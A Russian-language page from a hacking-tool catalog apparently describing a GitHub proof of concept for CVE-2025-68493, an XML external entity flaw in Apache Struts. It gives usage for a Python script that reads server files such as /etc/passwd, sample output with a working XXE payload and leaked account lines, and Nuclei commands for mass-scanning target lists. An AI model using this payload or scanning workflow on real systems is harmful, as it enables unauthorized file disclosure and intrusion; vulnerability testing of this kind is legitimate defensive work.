Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-68493 — CVE-2025-68493 | Kitploit
Инструменты/GitHubGitHub/hsltz/cve-2025-68493
Сканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubhsltz/cve-2025-68493

CVE-2025-68493

CVE-2025-68493

Репозиторий
26 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-68493

CVE-2025-68493

7. Ссылки

[1] Apache Struts XWork XML уязвимость CVE-2025-68493 PoC и скрипты | ZONE.CI Глобальная сеть. https://zone.ci/secarticles/wx/486533.html

8. Проверка и использование уязвимости

Для проверки и использования уязвимости CVE-2025-68493 можно использовать предоставленный Python PoC скрипт и шаблон Nuclei YAML.

8.1 Инструкция по использованию Python PoC скрипта

Имя скрипта: cve_2025_68493_poc.py

Функция: Этот скрипт используется для проверки уязвимости на одной цели, пытаясь прочитать указанный файл (по умолчанию /etc/passwd).

Предварительные требования:

  • Среда Python 3
  • Библиотека requests (pip install requests)

Аргументы командной строки:

  • -u, --url: Базовый URL целевого приложения (например: http://127.0.0.1:8080)
  • -f, --file: Путь к целевому файлу для чтения (по умолчанию /etc/passwd)

Пример:

root@kitploit:~
python3 cve_2025_68493_poc.py -u http://example.com:8080 -f /etc/passwd

Ожидаемый вывод:

Если цель уязвима и файл успешно прочитан, будет показано что-то вроде следующего:

root@kitploit:~
[*] Testing URL: http://example.com:8080/struts2-xml-parser/xmlParserNoDtdParse
[*] Payload: <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
[+] Vulnerable! Successfully read /etc/passwd
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
----------------------------------------

8.2 Инструкция по использованию шаблона Nuclei YAML

Имя шаблона: cve-2025-68493.yaml

Функция: Этот шаблон используется для массового сканирования нескольких целей с помощью инструмента Nuclei для обнаружения уязвимости CVE-2025-68493.

Предварительные требования:

  • Установленный инструмент Nuclei (рекомендуется v3.x и выше)

Аргументы командной строки:

  • -t: Путь к файлу шаблона Nuclei
  • -u: URL одной цели
  • -l: Файл, содержащий URL-адреса нескольких целей

Примеры:

Сканирование одной цели:

root@kitploit:~
nuclei -t cve-2025-68493.yaml -u http://example.com:8080

Массовое сканирование:

Предположим, у вас есть файл с именем targets.txt, в котором каждая строка содержит URL цели:

root@kitploit:~
http://target1.com:8080
http://target2.com:8080

Выполните следующую команду для массового сканирования:

root@kitploit:~
nuclei -t cve-2025-68493.yaml -l targets.txt
Скачать инструмент